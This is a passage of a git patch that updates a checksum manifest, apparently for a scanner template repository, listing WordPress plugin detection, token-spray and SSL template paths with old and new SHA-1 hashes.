-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6170,7 +6171,7 @@ http/token-spray/api-nerdgraph.yaml:eb7c825b7c1dfdea41f59a1f63e9283bb4b40c08 http/token-spray/api-netlify.yaml:8e0c907d30433722a2065ded3d68b293fd21e745 http/token-spray/api-networksdb.yaml:52bd66b85eb3afc506ee0028f193e6f076f64566 http/token-spray/api-newrelic.yaml:39270dabccfcd202f8c64ce051daa29851a43b72 -http/token-spray/api-notolytix.yaml:474eee89bd0acdf068a2ae159e0bc6d0cd651162 +http/token-spray/api-notolytix.yaml:048066f554787120087e7f8821909609335bfd4f http/token-spray/api-nownodes.yaml:ab9202c8d145453a5e64494c606e60cb9c89c58a http/token-spray/api-npm.yaml:11341dd47f3741abe55d3e840be0a9db8655b126 http/token-spray/api-nytimes.yaml:a118b331fdde18c040f0978adad59006cd060fec @@ -7045,7 +7046,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:be2f1522378a9700862e86e43cce210abc689d16 +templates-checksum.txt:377bfc06a71b3291d9ddbc2bd460103c4e3c222b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3c1a93bb1bf9d9e1a59109254e377cd2658db445 Mon Sep 17 00:00:00 2001 From: 